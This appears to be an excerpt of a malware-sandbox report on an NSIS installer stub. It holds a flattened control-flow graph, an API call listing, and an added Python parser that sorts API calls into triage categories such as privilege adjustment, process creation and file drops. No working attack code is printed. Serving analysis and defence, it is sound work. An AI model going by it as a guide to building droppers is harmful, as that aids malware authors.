4218 402933 4215->4218 4217 401fa4 CloseHandle 4216->4217 4217->4218 4220->4215 4221 402f98 4222 402faa SetTimer 4221->4222 4224 402fc3 4221->4224 4222->4224 4223 403018 4224->4223 4225 402fdd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4224->4225 4225->4223 4226 40571b 4227 4058c5 4226->4227 4228 40573c GetDlgItem GetDlgItem GetDlgItem 4226->4228 4230 4058f6 4227->4230 4231 4058ce GetDlgItem CreateThread CloseHandle 4227->4231 4271 40450b SendMessageW 4228->4271 4233 405921 4230->4233 4234 405946 4230->4234 4235 40590d ShowWindow ShowWindow 4230->4235 4231->4230 4232 4057ac 4238 4057b3 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4232->4238 4236 405981 4233->4236 4240 405935 4233->4240 4241 40595b ShowWindow 4233->4241 4237 40453d 8 API calls 4234->4237 4273 40450b SendMessageW 4235->4273 4236->4234 4248 40598f SendMessageW 4236->4248 4243 405954 4237->4243 4246 405821 4238->4246 4247 405805 SendMessageW SendMessageW 4238->4247 4242 4044af SendMessageW 4240->4242 4244 40597b 4241->4244 4245 40596d 4241->4245 4242->4234 4250 4044af SendMessageW 4244->4250 4249 4055dc 28 API calls 4245->4249 4251 405834 4246->4251 4252 405826 SendMessageW 4246->4252 4247->4246 4248->4243 4253 4059a8 CreatePopupMenu 4248->4253 4249->4244 4250->4236 4255 4044d6 22 API calls 4251->4255 4252->4251 4254 406594 21 API calls 4253->4254 4256 4059b8 AppendMenuW 4254->4256 4257 405844 4255->4257 4260 4059d5 GetWindowRect 4256->4260 4261 4059e8 TrackPopupMenu 4256->4261 4258 405881 GetDlgItem SendMessageW 4257->4258 4259 40584d ShowWindow 4257->4259 4258->4243 4265 4058a8 SendMessageW SendMessageW 4258->4265 4262 405870 4259->4262 4263 405863 ShowWindow 4259->4263 4260->4261 4261->4243 4264 405a03 4261->4264 4272 40450b SendMessageW 4262->4272 4263->4262 4266 405a1f SendMessageW 4264->4266 4265->4243 4266->4266 4267 405a3c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4266->4267 4269 405a61 SendMessageW 4267->4269 4269->4269 4270 405a8a GlobalUnlock SetClipboardData 
CloseClipboard 4269->4270 4270->4243 4271->4232 4272->4258 4273->4233 4274 401d1c 4275 402d89 21 API calls 4274->4275 4276 401d22 IsWindow 4275->4276 4277 401a25 4276->4277 4278 404d1d 4279 404d49 4278->4279 4280 404d2d 4278->4280 4281 404d7c 4279->4281 4282 404d4f SHGetPathFromIDListW 4279->4282 4289 405b9b GetDlgItemTextW 4280->4289 4284 404d5f 4282->4284 4288 404d66 SendMessageW 4282->4288 4286 40140b 2 API calls 4284->4286 4285 404d3a SendMessageW 4285->4279 4286->4288 4288->4281 4289->4285 4290 40149e 4291 4023a2 4290->4291 4292 4014ac PostQuitMessage 4290->4292 4292->4291 4293 401ba0 4294 401bf1 4293->4294 4295 401bad 4293->4295 4297 401bf6 4294->4297 4298 401c1b GlobalAlloc 4294->4298 4296 401c36 4295->4296 4302 401bc4 4295->4302 4299 406594 21 API calls 4296->4299 4311 4023a2 4296->4311 4297->4311 4314 406557 lstrcpynW 4297->4314 4300 406594 21 API calls 4298->4300 4301 40239c 4299->4301 4300->4296 4306 405bb7 MessageBoxIndirectW 4301->4306 4312 406557 lstrcpynW 4302->4312 4304 401c08 GlobalFree 4304->4311 4306->4311 4307 401bd3 4313 406557 lstrcpynW 4307->4313 4309 401be2 4315 406557 lstrcpynW 4309->4315 4312->4307 4313->4309 4314->4304 4315->4311 4316 402621 4317 402dab 21 API calls 4316->4317 4318 402628 4317->4318 4321 406047 GetFileAttributesW CreateFileW 4318->4321 4320 402634 4321->4320 4322 4025a3 4332 402deb 4322->4332 4325 402d89 21 API calls 4326 4025b6 4325->4326 4327 4025d2 RegEnumKeyW 4326->4327 4328 4025de RegEnumValueW 4326->4328 4329 402933 4326->4329 4330 4025f3 RegCloseKey 4327->4330 4328->4330 4330->4329 4333 402dab 21 API calls 4332->4333 4334 402e02 4333->4334 4335 4063c4 RegOpenKeyExW 4334->4335 4336 4025ad 4335->4336 4336->4325 4337 4015a8 4338 402dab 21 API calls 4337->4338 4339 4015af SetFileAttributesW 4338->4339 4340 4015c1 4339->4340 3478 401fa9 3479 402dab 21 API calls 3478->3479 3480 401faf 3479->3480 3481 4055dc 28 API calls 3480->3481 3482 401fb9 3481->3482 3483 405b3a 2 API calls 3482->3483 3484 401fbf 3483->3484 3485 
401fe2 CloseHandle 3484->3485 3489 402933 3484->3489 3493 4069f6 WaitForSingleObject 3484->3493 3485->3489 3488 401fd4 3490 401fe4 3488->3490 3491 401fd9 3488->3491 3490->3485 3498 40649e wsprintfW 3491->3498 3494 406a10 3493->3494 3495 406a22 GetExitCodeProcess 3494->3495 3496 406987 2 API calls 3494->3496 3495->3488 3497 406a17 WaitForSingleObject 3496->3497 3497->3494 3498->3485 4341 40202f 4342 402dab 21 API calls 4341->4342 4343 402036 4342->4343 4344 40694b 5 API calls 4343->4344 4345 402045 4344->4345 4346 402061 GlobalAlloc 4345->4346 4347 4020d1 4345->4347 4346->4347 4348 402075 4346->4348 4349 40694b 5 API calls 4348->4349 4350 40207c 4349->4350 4351 40694b 5 API calls 4350->4351 4352 402086 4351->4352 4352->4347 4356 40649e wsprintfW 4352->4356 4354 4020bf 4357 40649e wsprintfW 4354->4357 4356->4354 4357->4347 4358 40252f 4359 402deb 21 API calls 4358->4359 4360 402539 4359->4360 4361 402dab 21 API calls 4360->4361 4362 402542 4361->4362 4363 40254d RegQueryValueExW 4362->4363 4365 402933 4362->4365 4364 40256d 4363->4364 4368 402573 RegCloseKey 4363->4368 4364->4368 4369 40649e wsprintfW 4364->4369 4368->4365 4369->4368 4370 4021af 4371 402dab 21 API calls 4370->4371 4372 4021b6 4371->4372 4373 402dab 21 API calls 4372->4373 4374 4021c0 4373->4374 4375 402dab 21 API calls 4374->4375 4376 4021ca 4375->4376 4377 402dab 21 API calls 4376->4377 4378 4021d4 4377->4378 4379 402dab 21 API calls 4378->4379 4380 4021de 4379->4380 4381 40221d CoCreateInstance 4380->4381 4382 402dab 21 API calls 4380->4382 4385 40223c 4381->4385 4382->4381 4383 401423 28 API calls 4384 4022fb 4383->4384 4385->4383 4385->4384 2924 403532 SetErrorMode GetVersionExW 2925 403586 GetVersionExW 2924->2925 2926 4035be 2924->2926 2925->2926 2927 403615 2926->2927 2928 40694b 5 API calls 2926->2928 3012 4068db GetSystemDirectoryW 2927->3012 2928->2927 2930 40362b lstrlenA 2930->2927 2931 40363b 2930->2931 3015 40694b GetModuleHandleA 2931->3015 2934 40694b 5 API calls 2935 403649 
2934->2935 2936 40694b 5 API calls 2935->2936 2940 403655 #17 OleInitialize SHGetFileInfoW 2936->2940 2939 4036a4 GetCommandLineW 3022 406557 lstrcpynW 2939->3022 3021 406557 lstrcpynW 2940->3021 2942 4036b6 3023 405e53 2942->3023 2945 4037f0 2946 403804 GetTempPathW 2945->2946 3027 403501 2946->3027 2948 40381c 2949 403820 GetWindowsDirectoryW lstrcatW 2948->2949 2950 403876 DeleteFileW 2948->2950 2953 403501 12 API calls 2949->2953 3037 403082 GetTickCount GetModuleFileNameW 2950->3037 2951 405e53 CharNextW 2952 4036ee 2951->2952 2952->2945 2952->2951 2958 4037f2 2952->2958 2955 40383c 2953->2955 2955->2950 2957 403840 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 2955->2957 2956 40388a 2959 403a7d ExitProcess OleUninitialize 2956->2959 2963 403931 2956->2963 2967 405e53 CharNextW 2956->2967 2960 403501 12 API calls 2957->2960 3122 406557 lstrcpynW 2958->3122 2961 403ab3 2959->2961 2962 403a8f 2959->2962 2965 40386e 2960->2965 2968 403b37 ExitProcess 2961->2968 2969 403abb GetCurrentProcess OpenProcessToken 2961->2969 3214 405bb7 2962->3214 3065 403c29 2963->3065 2965->2950 2965->2959 2980 4038a9 2967->2980 2971 403ad3 LookupPrivilegeValueW AdjustTokenPrivileges 2969->2971 2972 403b07 2969->2972 2971->2972 2976 40694b 5 API calls 2972->2976 2977 403b0e 2976->2977 2982 403b23 ExitWindowsEx 2977->2982 2985 403b30 2977->2985 2978 403907 3123 405f2e 2978->3123 2979 40394a 3140 405b22 2979->3140 2980->2978 2980->2979 2982->2968 2982->2985 3218 40140b 2985->3218 2989 403969 2991 403972 2989->2991 3009 403981 2989->3009 3144 406557 lstrcpynW 2991->3144 2992 403926 3139 406557 lstrcpynW 2992->3139 2995 4039a7 wsprintfW 3145 406594 2995->3145 2999 4039e3 GetFileAttributesW 3001 4039ef DeleteFileW 2999->3001 2999->3009 3000 403a1d SetCurrentDirectoryW 3204 406317 MoveFileExW 3000->3204 3001->3009 3003 403a1b 3003->2959 3006 406317 40 API calls 3006->3009 3007 406594 21 API calls 3007->3009 3009->2995 3009->2999 3009->3000 3009->3003 3009->3006 
3009->3007 3010 403aa5 CloseHandle 3009->3010 3162 405aab CreateDirectoryW 3009->3162 3165 405b05 CreateDirectoryW 3009->3165 3168 405c63 3009->3168 3208 405b3a CreateProcessW 3009->3208 3211 4068b4 FindFirstFileW 3009->3211 3010->3003 3013 4068fd wsprintfW LoadLibraryExW 3012->3013 3013->2930 3016 406971 GetProcAddress 3015->3016 3017 406967 3015->3017 3018 403642 3016->3018 3019 4068db 3 API calls 3017->3019 3018->2934 3020 40696d 3019->3020 3020->3016 3020->3018 3021->2939 3022->2942 3024 405e59 3023->3024 3025 4036dc CharNextW 3024->3025 3026 405e60 CharNextW 3024->3026 3025->2952 3026->3024 3221 406805 3027->3221 3029 403517 3029->2948 3030 40350d 3030->3029 3230 405e26 lstrlenW CharPrevW 3030->3230 3033 405b05 2 API calls 3034 403525 3033->3034 3233 406076 3034->3233 3237 406047 GetFileAttributesW CreateFileW 3037->3237 3039 4030c2 3057 4030d2 3039->3057 3238 406557 lstrcpynW 3039->3238 3041 4030e8 3239 405e72 lstrlenW 3041->3239 3045 4030f9 GetFileSize 3046 4031f3 3045->3046 3059 403110 3045->3059 3244 40301e 3046->3244 3048 4031fc 3050 40322c GlobalAlloc 3048->3050 3048->3057 3279 4034ea SetFilePointer 3048->3279 3255 4034ea SetFilePointer 3050->3255 3052 40325f 3054 40301e 6 API calls 3052->3054 3054->3057 3055 403215 3058 4034d4 ReadFile 3055->3058 3056 403247 3256 4032b9 3056->3256 3057->2956 3061 403220 3058->3061 3059->3046 3059->3052 3059->3057 3062 40301e 6 API calls 3059->3062 3276 4034d4 3059->3276 3061->3050 3061->3057 3062->3059 3063 403253 3063->3057 3063->3063 3064 403290 SetFilePointer 3063->3064 3064->3057 3066 40694b 5 API calls 3065->3066 3067 403c3d 3066->3067 3068 403c43 3067->3068 3069 403c55 3067->3069 3308 40649e wsprintfW 3068->3308 3309 406425 3069->3309 3072 403ca4 lstrcatW 3074 403c53 3072->3074 3300 403eff 3074->3300 3075 406425 3 API calls 3075->3072 3078 405f2e 18 API calls 3079 403cd6 3078->3079 3080 403d6a 3079->3080 3083 406425 3 API calls 3079->3083 3081 405f2e 18 API calls 3080->3081 3082 403d70 3081->3082 3084 403d80 
LoadImageW 3082->3084 3086 406594 21 API calls 3082->3086 3085 403d08 3083->3085 3087 403e26 3084->3087 3088 403da7 RegisterClassW 3084->3088 3085->3080 3089 403d29 lstrlenW 3085->3089 3092 405e53 CharNextW 3085->3092 3086->3084 3091 40140b 2 API calls 3087->3091 3090 403ddd SystemParametersInfoW CreateWindowExW 3088->3090 3098 403941 3088->3098 3093 403d37 lstrcmpiW 3089->3093 3094 403d5d 3089->3094 3090->3087 3095 403e2c 3091->3095 3096 403d26 3092->3096 3093->3094 3097 403d47 GetFileAttributesW 3093->3097 3099 405e26 3 API calls 3094->3099 3095->3098 3101 403eff 22 API calls 3095->3101 3096->3089 3100 403d53 3097->3100 3098->2959 3102 403d63 3099->3102 3100->3094 3103 405e72 2 API calls 3100->3103 3104 403e3d 3101->3104 3314 406557 lstrcpynW 3102->3314 3103->3094 3106 403e49 ShowWindow 3104->3106 3107 403ecc 3104->3107 3109 4068db 3 API calls 3106->3109 3315 4056af OleInitialize 3107->3315 3111 403e61 3109->3111 3110 403ed2 3113 403ed6 3110->3113 3114 403eee 3110->3114 3112 403e6f GetClassInfoW 3111->3112 3115 4068db 3 API calls 3111->3115 3117 403e83 GetClassInfoW RegisterClassW 3112->3117 3118 403e99 DialogBoxParamW 3112->3118 3113->3098 3120 40140b 2 API calls 3113->3120 3116 40140b 2 API calls 3114->3116 3115->3112 3116->3098 3117->3118 3119 40140b 2 API calls 3118->3119 3121 403ec1 3119->3121 3120->3098 3121->3098 3122->2946 3337 406557 lstrcpynW 3123->3337 3125 405f3f 3338 405ed1 CharNextW CharNextW 3125->3338 3128 403913 3128->2959 3138 406557 lstrcpynW 3128->3138 3129 406805 5 API calls 3130 405f55 3129->3130 3130->3128 3135 405f6c 3130->3135 3131 405f86 lstrlenW 3132 405f91 3131->3132 3131->3135 3134 405e26 3 API calls 3132->3134 3133 4068b4 2 API calls 3133->3135 3136 405f96 GetFileAttributesW 3134->3136 3135->3128 3135->3131 3135->3133 3137 405e72 2 API calls 3135->3137 3136->3128 3137->3131 3138->2992 3139->2963 3141 40694b 5 API calls 3140->3141 3142 40394f lstrlenW 3141->3142 3143 406557 lstrcpynW 3142->3143 3143->2989 3144->3009 3160 40659f 
3145->3160 3146 4067e6 3147 4067ff 3146->3147 3346 406557 lstrcpynW 3146->3346 3147->3009 3149 4067b7 lstrlenW 3149->3160 3151 406425 3 API calls 3151->3160 3153 4066b0 GetSystemDirectoryW 3153->3160 3154 406594 15 API calls 3154->3149 3155 4066c6 GetWindowsDirectoryW 3155->3160 3156 406805 5 API calls 3156->3160 3157 406594 15 API calls 3157->3160 3158 406758 lstrcatW 3158->3160 3159 40694b 5 API calls 3159->3160 3160->3146 3160->3149 3160->3151 3160->3153 3160->3154 3160->3155 3160->3156 3160->3157 3160->3158 3160->3159 3161 406728 SHGetPathFromIDListW CoTaskMemFree 3160->3161 3344 40649e wsprintfW 3160->3344 3345 406557 lstrcpynW 3160->3345 3161->3160 3163 405af7 3162->3163 3164 405afb GetLastError 3162->3164 3163->3009 3164->3163 3166 405b15 3165->3166 3167 405b19 GetLastError 3165->3167 3166->3009 3167->3166 3169 405f2e 18 API calls 3168->3169 3170 405c83 3169->3170 3171 405ca2 3170->3171 3172 405c8b DeleteFileW 3170->3172 3173 405dc2 3171->3173 3347 406557 lstrcpynW 3171->3347 3201 405dd9 3172->3201 3180 4068b4 2 API calls 3173->3180 3173->3201 3175 405cc8 3176 405cdb 3175->3176 3177 405cce lstrcatW 3175->3177 3179 405e72 2 API calls 3176->3179 3178 405ce1 3177->3178 3181 405cf1 lstrcatW 3178->3181 3183 405cfc lstrlenW FindFirstFileW 3178->3183 3179->3178 3182 405de7 3180->3182 3181->3183 3184 405e26 3 API calls 3182->3184 3182->3201 3183->3173 3185 405d1e 3183->3185 3186 405df1 3184->3186 3187 405da5 FindNextFileW 3185->3187 3197 405c63 64 API calls 3185->3197 3199 4055dc 28 API calls 3185->3199 3202 4055dc 28 API calls 3185->3202 3203 406317 40 API calls 3185->3203 3348 406557 lstrcpynW 3185->3348 3349 405c1b 3185->3349 3188 405c1b 5 API calls 3186->3188 3187->3185 3191 405dbb FindClose 3187->3191 3190 405dfd 3188->3190 3192 405e17 3190->3192 3193 405e01 3190->3193 3191->3173 3195 4055dc 28 API calls 3192->3195 3196 4055dc 28 API calls 3193->3196 3193->3201 3195->3201 3198 405e0e 3196->3198 3197->3185 3200 406317 40 API calls 3198->3200 3199->3187 
3200->3201 3201->3009 3202->3185 3203->3185 3205 403a2c CopyFileW 3204->3205 3206 40632b 3204->3206 3205->3003 3205->3009 3360 40619d 3206->3360 3209 405b79 3208->3209 3210 405b6d CloseHandle 3208->3210 3209->3009 3210->3209 3212 4068ca FindClose 3211->3212 3213 4068d5 3211->3213 3212->3213 3213->3009 3215 405bcc 3214->3215 3216 403a9d ExitProcess 3215->3216 3217 405be0 MessageBoxIndirectW 3215->3217 3217->3216 3219 401389 2 API calls 3218->3219 3220 401420 3219->3220 3220->2968 3227 406812 3221->3227 3222 40688d CharPrevW 3223 406888 3222->3223 3223->3222 3225 4068ae 3223->3225 3224 40687b CharNextW 3224->3223 3224->3227 3225->3030 3226 405e53 CharNextW 3226->3227 3227->3223 3227->3224 3227->3226 3228 406867 CharNextW 3227->3228 3229 406876 CharNextW 3227->3229 3228->3227 3229->3224 3231 405e42 lstrcatW 3230->3231 3232 40351f 3230->3232 3231->3232 3232->3033 3234 406083 GetTickCount GetTempFileNameW 3233->3234 3235 4060b9 3234->3235 3236 403530 3234->3236 3235->3234 3235->3236 3236->2948 3237->3039 3238->3041 3240 405e80 3239->3240 3241 4030ee 3240->3241 3242 405e86 CharPrevW 3240->3242 3243 406557 lstrcpynW 3241->3243 3242->3240 3242->3241 3243->3045 3245 403027 3244->3245 3246 40303f 3244->3246 3247 403030 DestroyWindow 3245->3247 3248 403037 3245->3248 3249 403047 3246->3249 3250 40304f GetTickCount 3246->3250 3247->3248 3248->3048 3280 406987 3249->3280 3251 403080 3250->3251 3252 40305d CreateDialogParamW ShowWindow 3250->3252 3251->3048 3252->3251 3255->3056 3258 4032d2 3256->3258 3257 403300 3259 4034d4 ReadFile 3257->3259 3258->3257 3286 4034ea SetFilePointer 3258->3286 3261 40330b 3259->3261 3262 40346d 3261->3262 3263 40331d GetTickCount 3261->3263 3265 403457 3261->3265 3264 4034af 3262->3264 3269 403471 3262->3269 3263->3265 3272 40336c 3263->3272 3266 4034d4 ReadFile 3264->3266 3265->3063 3266->3265 3267 4034d4 ReadFile 3267->3272 3268 4034d4 ReadFile 3268->3269 3269->3265 3269->3268 3270 4060f9 WriteFile 3269->3270 3270->3269 3271 4033c2 GetTickCount 
3271->3272 3272->3265 3272->3267 3272->3271 3273 4033e7 MulDiv wsprintfW 3272->3273 3284 4060f9 WriteFile 3272->3284 3287 4055dc 3273->3287 3298 4060ca ReadFile 3276->3298 3279->3055 3281 4069a4 PeekMessageW 3280->3281 3282 40304d 3281->3282 3283 40699a DispatchMessageW 3281->3283 3282->3048 3283->3281 3285 406117 3284->3285 3285->3272 3286->3257 3288 4055f7 3287->3288 3289 405699 3287->3289 3290 405613 lstrlenW 3288->3290 3293 406594 21 API calls 3288->3293 3289->3272 3291 405621 lstrlenW 3290->3291 3292 40563c 3290->3292 3291->3289 3294 405633 lstrcatW 3291->3294 3295 405642 SetWindowTextW 3292->3295 3296 40564f 3292->3296 3293->3290 3294->3292 3295->3296 3296->3289 3297 405655 SendMessageW SendMessageW SendMessageW 3296->3297 3297->3289 3299 4034e7 3298->3299 3299->3059 3301 403f13 3300->3301 3322 40649e wsprintfW 3301->3322 3303 403f84 3323 403fb8 3303->3323 3305 403f89 3306 403cb4 3305->3306 3307 406594 21 API calls 3305->3307 3306->3078 3307->3305 3308->3074 3326 4063c4 3309->3326 3312 403c85 3312->3072 3312->3075 3313 406459 RegQueryValueExW RegCloseKey 3313->3312 3314->3080 3330 404522 3315->3330 3317 4056f9 3318 404522 SendMessageW 3317->3318 3320 40570b OleUninitialize 3318->3320 3319 4056d2 3319->3317 3333 401389 3319->3333 3320->3110 3322->3303 3324 406594 21 API calls 3323->3324 3325 403fc6 SetWindowTextW 3324->3325 3325->3305 3327 4063d3 3326->3327 3328 4063d7 3327->3328 3329 4063dc RegOpenKeyExW 3327->3329 3328->3312 3328->3313 3329->3328 3331 40453a 3330->3331 3332 40452b SendMessageW 3330->3332 3331->3319 3332->3331 3335 401390 3333->3335 3334 4013fe 3334->3319 3335->3334 3336 4013cb MulDiv SendMessageW 3335->3336 3336->3335 3337->3125 3339 405eee 3338->3339 3342 405f00 3338->3342 3341 405efb CharNextW 3339->3341 3339->3342 3340 405f24 3340->3128 3340->3129 3341->3340 3342->3340 3343 405e53 CharNextW 3342->3343 3343->3342 3344->3160 3345->3160 3346->3147 3347->3175 3348->3185 3357 406022 GetFileAttributesW 3349->3357 3352 405c48 3352->3185 3353 
405c36 RemoveDirectoryW 3355 405c44 3353->3355 3354 405c3e DeleteFileW 3354->3355 3355->3352 3356 405c54 SetFileAttributesW 3355->3356 3356->3352 3358 405c27 3357->3358 3359 406034 SetFileAttributesW 3357->3359 3358->3352 3358->3353 3358->3354 3359->3358 3361 4061f3 GetShortPathNameW 3360->3361 3362 4061cd 3360->3362 3364 406312 3361->3364 3365 406208 3361->3365 3387 406047 GetFileAttributesW CreateFileW 3362->3387 3364->3205 3365->3364 3367 406210 wsprintfA 3365->3367 3366 4061d7 CloseHandle GetShortPathNameW 3366->3364 3368 4061eb 3366->3368 3369 406594 21 API calls 3367->3369 3368->3361 3368->3364 3370 406238 3369->3370 3388 406047 GetFileAttributesW CreateFileW 3370->3388 3372 406245 3372->3364 3373 406254 GetFileSize GlobalAlloc 3372->3373 3374 406276 3373->3374 3375 40630b CloseHandle 3373->3375 3376 4060ca ReadFile 3374->3376 3375->3364 3377 40627e 3376->3377 3377->3375 3389 405fac lstrlenA 3377->3389 3380 406295 lstrcpyA 3383 4062b7 3380->3383 3381 4062a9 3382 405fac 4 API calls 3381->3382 3382->3383 3384 4062ee SetFilePointer 3383->3384 3385 4060f9 WriteFile 3384->3385 3386 406304 GlobalFree 3385->3386 3386->3375 3387->3366 3388->3372 3390 405fed lstrlenA 3389->3390 3391 405ff5 3390->3391 3392 405fc6 lstrcmpiA 3390->3392 3391->3380 3391->3381 3392->3391 3393 405fe4 CharNextA 3392->3393 3393->3390 4386 401a35 4387 402dab 21 API calls 4386->4387 4388 401a3e ExpandEnvironmentStringsW 4387->4388 4389 401a52 4388->4389 4391 401a65 4388->4391 4390 401a57 lstrcmpW 4389->4390 4389->4391 4390->4391 4397 4023b7 4398 4023c5 4397->4398 4399 4023bf 4397->4399 4401 4023d3 4398->4401 4402 402dab 21 API calls 4398->4402 4400 402dab 21 API calls 4399->4400 4400->4398 4403 4023e1 4401->4403 4404 402dab 21 API calls 4401->4404 4402->4401 4405 402dab 21 API calls 4403->4405 4404->4403 4406 4023ea WritePrivateProfileStringW 4405->4406 4407 4014b8 4408 4014be 4407->4408 4409 401389 2 API calls 4408->4409 4410 4014c6 4409->4410 4411 402439 4412 402441 4411->4412 4413 40246c 
4411->4413 4415 402deb 21 API calls 4412->4415 4414 402dab 21 API calls 4413->4414 4416 402473 4414->4416 4417 402448 4415->4417 4422 402e69 4416->4422 4419 402dab 21 API calls 4417->4419 4421 402480 4417->4421 4420 402459 RegDeleteValueW RegCloseKey 4419->4420 4420->4421 4423 402e76 4422->4423 4424 402e7d 4422->4424 4423->4421 4424->4423 4426 402eae 4424->4426 4427 4063c4 RegOpenKeyExW 4426->4427 4428 402edc 4427->4428 4429 402f86 4428->4429 4430 402eec RegEnumValueW 4428->4430 4434 402f0f 4428->4434 4429->4423 4431 402f76 RegCloseKey 4430->4431 4430->4434 4431->4429 4432 402f4b RegEnumKeyW 4433 402f54 RegCloseKey 4432->4433 4432->4434 4435 40694b 5 API calls 4433->4435 4434->4431 4434->4432 4434->4433 4436 402eae 6 API calls 4434->4436 4437 402f64 4435->4437 4436->4434 4437->4429 4438 402f68 RegDeleteKeyW 4437->4438 4438->4429 4439 40173a 4440 402dab 21 API calls 4439->4440 4441 401741 SearchPathW 4440->4441 4442 40175c 4441->4442 4443 401d3d 4444 402d89 21 API calls 4443->4444 4445 401d44 4444->4445 4446 402d89 21 API calls 4445->4446 4447 401d50 GetDlgItem 4446->4447 4448 40263d 4447->4448
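The report's control-flow graph survives in text form only as a flat list of node records, collapsed "N API calls" summaries and "src->dst" edges. The parser below, an added example that is not part of the original report or of Joe Sandbox, reads that flattened format and produces a per-address list of API calls, then flags the families a triager looks at first: privilege adjustment, child-process creation, dynamic API resolution, registry writes and file drops. The format itself is an assumption inferred from the report text (short decimal node ids, six-digit lowercase hex addresses, edges written as "id->id"), and SAMPLE is a constructed excerpt in that format, not the full graph.

```python
"""Extract per-block Windows API calls from a Joe Sandbox control-flow-graph
dump. Added example, not part of the original report or of Joe Sandbox.

Format assumed from the flattened graph text: whitespace-separated tokens that
are either a node record "<node-id> <hex-address> [ApiName ...]", a collapsed
callee summary "<n> API calls", or an edge "<src-id>-><dst-id>". Node ids are
short decimal numbers; addresses are six lowercase hex digits (assumption).
"""
import re
from collections import defaultdict

NODE_ID = re.compile(r"^\d{1,5}$")      # graph node id, e.g. 3744
ADDRESS = re.compile(r"^[0-9a-f]{6}$")  # image address, e.g. 403532 or 4014d7
EDGE = re.compile(r"^(\d+)->(\d+)$")    # control-flow edge between node ids

# API families that deserve a second look in a dropper stub; the "registry"
# family is matched by prefix (any Reg* call) rather than by an explicit list.
SENSITIVE = {
    "privilege": {"OpenProcessToken", "LookupPrivilegeValueW",
                  "AdjustTokenPrivileges", "ExitWindowsEx"},
    "process": {"CreateProcessW", "ShellExecuteExW", "CreateThread",
                "WaitForSingleObject", "GetExitCodeProcess"},
    "loader": {"LoadLibraryExW", "GetProcAddress",
               "GetModuleHandleA", "GetModuleHandleW"},
    "filedrop": {"CreateFileW", "WriteFile", "MoveFileW", "MoveFileExW",
                 "CopyFileW", "SetFileAttributesW", "SetFileTime"},
}


def parse_cfg(text):
    """Return ({node_id: (address, [api, ...])}, [(src, dst), ...])."""
    nodes, edges = {}, []
    tokens = text.split()
    cur = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        m = EDGE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
        elif NODE_ID.match(tok) and ADDRESS.match(nxt):
            cur = int(tok)                 # start of a new node record
            nodes[cur] = (nxt, [])
            i += 2
        elif NODE_ID.match(tok) and nxt == "API":
            i += 3                         # "<n> API calls": no API name here
        else:
            if cur is not None:            # anything else is an API name
                nodes[cur][1].append(tok)
            i += 1
    return nodes, edges


def apis_by_address(nodes):
    """Merge API lists by code address; one block can appear in several graphs."""
    merged = defaultdict(set)
    for addr, apis in nodes.values():
        merged[addr].update(apis)
    return {addr: sorted(apis) for addr, apis in merged.items() if apis}


def flag_sensitive(nodes):
    """Map each sensitive family to the sorted addresses of blocks calling it."""
    hits = defaultdict(set)
    for addr, apis in apis_by_address(nodes).items():
        for api in apis:
            if api.startswith("Reg"):
                hits["registry"].add(addr)
            for family, names in SENSITIVE.items():
                if api in names:
                    hits[family].add(addr)
    return {family: sorted(addrs) for family, addrs in hits.items()}


# Constructed sample in the dump's format: a handful of records shaped like the
# report's graph text, not the complete graph.
SAMPLE = (
    "2924 403532 SetErrorMode GetVersionExW 2925 403586 GetVersionExW 2924->2925 "
    "2969 403abb GetCurrentProcess OpenProcessToken 2961->2969 "
    "2971 403ad3 LookupPrivilegeValueW AdjustTokenPrivileges 2969->2971 "
    "4120 40250e RegSetValueExW 4116->4120 4121 4032b9 35 API calls 4116->4121 "
    "3208 405b3a CreateProcessW 3009->3208 3016 406971 GetProcAddress 3015->3016"
)

if __name__ == "__main__":
    nodes, edges = parse_cfg(SAMPLE)
    print(f"{len(nodes)} nodes, {len(edges)} edges")
    for family, addrs in sorted(flag_sensitive(nodes).items()):
        print(f"{family:10s} {' '.join(addrs)}")
```

Paste the whole flattened graph text into parse_cfg in place of SAMPLE to get the full per-address table; the "N API calls" summaries are deliberately dropped because they name no API, so a block that only calls into such a helper shows up with an empty list and the helper's own block carries the names.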

                                                                                                                                    Control-flow Graph

                                                                                                                                    [Graph image with executed / not-executed block colouring, not reproduced. Function at 00403532 (NSIS stub entry), basic blocks 403532..403b49. Notable blocks: 403532..4035b6 SetErrorMode / GetVersionExW; 403668..4036cc OleInitialize, SHGetFileInfoW, GetCommandLineW; 403804..403870 GetTempPathW, GetWindowsDirectoryW, lstrcatW, SetEnvironmentVariableW (TEMP / TMP); 403876..403890 DeleteFileW then call 403082; 4039a7..403a5f wsprintfW, GetFileAttributesW / DeleteFileW, SetCurrentDirectoryW, CopyFileW, call 405b3a; 403abb..403b2e GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, ExitWindowsEx (reboot path); terminal blocks 403a7d, 403a9f and 403b49 ExitProcess. Node/edge list omitted; per-call details are under APIs below.]
                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNELBASE ref: 00403555
                                                                                                                                    • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403580
                                                                                                                                    • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00403593
                                                                                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040362C
                                                                                                                                    • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403669
                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 00403670
                                                                                                                                    • SHGetFileInfoW.SHELL32(0042AA28,00000000,?,000002B4,00000000), ref: 0040368F
                                                                                                                                    • GetCommandLineW.KERNEL32(00433700,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036A4
                                                                                                                                    • CharNextW.USER32(00000000,0043F000,00000020,0043F000,00000000,?,00000008,0000000A,0000000C), ref: 004036DD
                                                                                                                                    • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403815
                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403826
                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403832
